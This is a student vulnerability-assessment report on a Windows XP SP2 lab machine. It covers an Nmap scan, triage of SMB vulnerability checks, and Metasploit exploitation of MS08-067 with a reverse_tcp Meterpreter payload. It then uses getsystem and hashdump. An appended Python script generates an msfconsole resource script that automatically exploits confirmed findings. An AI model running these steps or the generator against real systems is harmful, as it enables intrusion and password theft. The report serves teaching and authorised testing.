Security Vulnerability Report
Security Vulnerability Report conducted by ICSS student Parag Thakur. The full project is discussed below:
Project Name: Security Vulnerability Report
Author Name: Parag Thakur
Publish Date: 05-07-2018
Focus of Assessment:
A network-based assessment of a single device running Windows XP Professional SP2. Google hacking, password cracking, firewall analysis and social engineering were out of scope.
Table of Contents
- Table of Contents
- Executive Summary
- Findings and Recommendations
- Gaining Access
Executive Summary:
The assessment described in this report was performed between 5 July 2018 and 6 July 2018 as a vulnerability assessment of a client system running Windows XP Professional SP2. After identifying a vulnerability, I demonstrate gaining access to the client's personal computer with the Metasploit Framework. The scan was performed with Network Mapper (Nmap) v7.60.
An external vulnerability scan is used to gather data for assessing the effectiveness of the security controls currently in place at the system level. That data is then used as evidence to support the findings and recommendations in this document. The purpose of the scan was to report critical, moderate and low-severity vulnerabilities to the client, as a baseline for the client's privacy and for measuring the system against current industry security practice.
Nmap (Network Mapper) v7.60– Nmap is a security scanner, originally written by Gordon Lyon, used to discover hosts and services on a computer network, thus building a “map” of the network.
Metasploit Framework by Rapid7– The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Disclaimer: All scans were performed with the client's permission, because scanning can expose private data and carries a real risk of crashing the target system or its services.
Step 1: Perform an Nmap fast scan (-F) of 192.168.43.11 with the aggressive option (-A) and the NSE (Nmap Scripting Engine) vulnerability scripts enabled for the vulnerability assessment.
Note: -F scans only the 100 most common ports instead of Nmap's default 1000, and -A adds service version detection, OS detection and traceroute. The scan took up to 79.99 seconds to complete; it can be tuned with the timing and host-discovery options described at https://nmap.org/book, for example -Pn (skip host discovery) or --max-rtt-timeout.
Findings and Recommendations:
The following ports were open: 135/tcp (msrpc), 139/tcp (netbios-ssn) and 445/tcp (microsoft-ds). Because the aggressive scan includes OS detection (-O), service detection (-sV) and traceroute (--traceroute) by default, the service version details were obtained as well and are summarised below.

| Field | Value |
|---|---|
| Device type | General purpose |
| Operating system | Microsoft Windows XP or 2003 (Nmap fingerprint "Microsoft Windows XP\|2003") |
| Traceroute | 1 hop, RTT 1.12 ms |
The vulnerability scan of the target IP 192.168.43.11 reported the results listed below:
- samba-vuln-cve-2012-1182 : Samba Remote Heap Overflow CVE: CVE-2012-1182
Samba versions 3.6.3 and all earlier versions are affected by a vulnerability that allows remote code execution as the "root" user from an anonymous connection.
This was a false positive: the report shows NT_STATUS_ACCESS_DENIED, meaning the check could not complete because I had no administrative privileges, so it is not counted as a vulnerability. Note also that this script tests Samba, the Unix SMB implementation; the target runs Microsoft's own SMB service, so CVE-2012-1182 does not apply to it in any case.
- smb-vuln-ms08-067: Microsoft Windows system vulnerable to remote code execution CVE: CVE-2008-4250
It allows remote attackers to execute arbitrary code via a crafted RPC request that triggers an overflow during path canonicalization.
Here the reported state was VULNERABLE, so this major vulnerability in the client's system is the one used for the exploitation steps that follow.
- smb-vuln-ms10-054: SMB Remote Memory Corruption Vulnerability CVE: CVE-2010-2550
It allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability".
The check returned false in the report, i.e. the check ran and found the system not vulnerable, so this is not a finding on the client's system.
- smb-vuln-ms10-061: CVE: CVE-2010-2729
This vulnerability was used by the Stuxnet worm. The script checks for the vulnerability in a safe way, without any possibility of crashing the remote system, as this is not a memory corruption vulnerability. For the check to work it needs access to at least one shared printer on the remote system. By default it tries to enumerate printers using the LANMAN API, which on some systems is not available by default; in that case the user should specify the printer share name as the printer script argument. To find a printer share, smb-enum-shares can be used. Also, on some systems, accessing shares requires valid credentials, which can be specified with the smb library arguments smbuser and smbpassword.
The report says script execution failed, so this was treated as a false positive and no finding was made. Strictly, a failed check (for example because no printer share was reachable) is inconclusive rather than proof that the system is not vulnerable; it should be rerun with a printer share name or credentials before being closed.
- smb-vuln-ms17-010: Remote Code Execution vulnerability in Microsoft SMBv1 servers (MS17-010)
Risk Factor: HIGH
It allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability".
The check did not report the system as vulnerable, so I treated it as a false positive and did not pursue it. OS detection showed the system as Microsoft Windows XP|2003, and I had assumed that a vulnerability in "SMBv1 servers" did not apply to a personal edition; note, however, that "SMBv1 server" refers to the SMB service present on every Windows version, Windows XP included (Microsoft released MS17-010 fixes for XP in 2017), so the Windows edition alone is not a reason to rule this check out. The script's result is.
Note: These are the results reported by the Nmap Scripting Engine. The only one that gave me access to the system was smb-vuln-ms08-067 (CVE-2008-4250), as stated above.
Step 2: After the vulnerability assessment, open a terminal and start the Metasploit Framework with the msfconsole command.
Step 3: Search the Metasploit module database for the vulnerability found, ms08-067.
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
Step 4: From the search results, select the module highlighted in the screenshots (not reproduced here) for the next steps.
Step 5: Set the payload to windows/meterpreter/reverse_tcp.
Step 6: Set LHOST to the attacker IP (192.168.43.28) and RHOST to the victim IP (192.168.43.11).
Step 7: Run show options to confirm which module and payload options are already set.
Step 8: Run exploit. A session was opened on the client's system, and the client's privacy is under threat.
With access to the system I could do anything I wanted: getsystem escalates privileges to NT AUTHORITY\SYSTEM, hashdump dumps the local account password hashes (LM/NTLM hashes, not encrypted passwords), and those hashes can be cracked offline with John the Ripper or a similar tool. Much more could be done that would put the client at risk, so the issue should be fixed as soon as possible.
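The findings above are only worth acting on once each NSE result has been sorted into confirmed, not vulnerable and inconclusive, and Steps 2 to 8 are then repeated by hand for each confirmed finding. The script below is an added example, not code from the report or from Nmap or Metasploit: it reads the structured XML that Nmap writes with -oX (assumed here to come from a run such as nmap -F -A --script vuln -oX scan.xml 192.168.43.11), applies the triage rules used in the findings section (a vulns-library table with state VULNERABLE is a finding, a bare "false" is not vulnerable, an error or NT_STATUS_ACCESS_DENIED is inconclusive), and emits an msfconsole resource script for confirmed findings only. The sample XML is constructed to mirror this report's results, and the module path exploit/windows/smb/ms08_067_netapi and listener port 4444 are assumptions, since the report's screenshots are not reproduced here.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output (not a real capture), trimmed to the
# parts the triage needs. States mirror the report: MS08-067 confirmed,
# MS10-054 and MS17-010 reported as "false", MS10-061 failed to execute,
# and the Samba check blocked by NT_STATUS_ACCESS_DENIED.
SAMPLE_XML = """<nmaprun scanner="nmap" version="7.60">
<host><status state="up"/><address addr="192.168.43.11" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
<port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
</ports>
<hostscript>
<script id="smb-vuln-ms08-067" output="VULNERABLE: ...">
<table key="CVE-2008-4250">
<elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
<elem key="state">VULNERABLE</elem>
<table key="ids"><elem>CVE:CVE-2008-4250</elem></table>
<elem key="risk_factor">HIGH</elem>
</table>
</script>
<script id="smb-vuln-ms10-054" output="false"/>
<script id="smb-vuln-ms10-061" output="ERROR: Script execution failed (use -d to debug)"/>
<script id="smb-vuln-ms17-010" output="false"/>
<script id="samba-vuln-cve-2012-1182" output="NT_STATUS_ACCESS_DENIED"/>
</hostscript>
</host>
</nmaprun>"""

# Assumed NSE-id -> Metasploit module mapping. Only the module the report
# used is listed, so nothing is emitted for findings without a known module.
MSF_MODULES = {"smb-vuln-ms08-067": "exploit/windows/smb/ms08_067_netapi"}


def parse_host_scripts(xml_text):
    """Map each NSE script id to a structured result.

    A script that wrote a vulns-library table gets that table's state
    (VULNERABLE / NOT VULNERABLE / LIKELY VULNERABLE). A bare "false" means
    the check ran and found nothing. Anything else (execution errors, access
    denied) stays UNKNOWN: inconclusive, never silently "not vulnerable".
    """
    results = {}
    for script in ET.fromstring(xml_text).iter("script"):
        entry = {"state": "UNKNOWN", "title": None, "ids": [],
                 "raw": script.get("output", "").strip()}
        for vuln in script.findall("table"):
            state = vuln.find("elem[@key='state']")
            title = vuln.find("elem[@key='title']")
            ids = vuln.find("table[@key='ids']")
            if state is not None:
                entry["state"] = state.text.strip()
            if title is not None:
                entry["title"] = title.text.strip()
            if ids is not None:
                entry["ids"] = [e.text.strip() for e in ids.findall("elem")]
        if entry["state"] == "UNKNOWN" and entry["raw"].lower() == "false":
            entry["state"] = "NOT VULNERABLE"
        results[script.get("id")] = entry
    return results


def triage_reason(entry):
    """One-line justification for the report of how a result was classified."""
    if entry["state"] == "VULNERABLE":
        return "confirmed by NSE check"
    if entry["state"] == "NOT VULNERABLE":
        return "check ran, target not affected"
    if "ACCESS_DENIED" in entry["raw"]:
        return "inconclusive: check needs credentials/admin access"
    if entry["raw"].startswith("ERROR"):
        return "inconclusive: script failed (rerun with -d)"
    return "inconclusive: no structured result"


def confirmed(results):
    """Only a literal VULNERABLE state counts; UNKNOWN is never promoted."""
    return {sid: r for sid, r in results.items() if r["state"] == "VULNERABLE"}


def build_resource_script(results, rhost, lhost, lport=4444,
                          payload="windows/meterpreter/reverse_tcp"):
    """Emit an msfconsole resource script (run with: msfconsole -r file.rc)
    covering each confirmed finding with a mapped module, or None if none."""
    lines = []
    for sid, r in confirmed(results).items():
        module = MSF_MODULES.get(sid)
        if module is None:
            continue
        lines += [f"# {sid}: {r['title']} ({', '.join(r['ids'])})",
                  f"use {module}", f"set PAYLOAD {payload}",
                  f"set RHOST {rhost}", f"set LHOST {lhost}",
                  f"set LPORT {lport}", "exploit"]
    return "\n".join(lines) + "\n" if lines else None


if __name__ == "__main__":
    res = parse_host_scripts(SAMPLE_XML)
    for sid, r in res.items():
        print(f"{sid:28} {r['state']:16} {triage_reason(r)}")
    print(build_resource_script(res, "192.168.43.11", "192.168.43.28") or "nothing confirmed")
```

The important design choice is that an inconclusive result is never collapsed into "not vulnerable": the MS10-061 and Samba checks stay UNKNOWN with the raw error attached, so a reviewer sees why they need a rerun with a printer share or credentials rather than a line that looks like a clean negative.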
- Patch the system with the latest Microsoft security updates to close this vulnerability (MS08-067 was fixed in October 2008). Windows XP SP2 is long out of support, so upgrading to a supported Windows version is the real fix.
- Deploy a properly configured firewall and IDS so that the SMB ports (135, 139, 445) appear filtered, not open, to an external Nmap scan.
- Maintain security with weekly or monthly vulnerability assessments.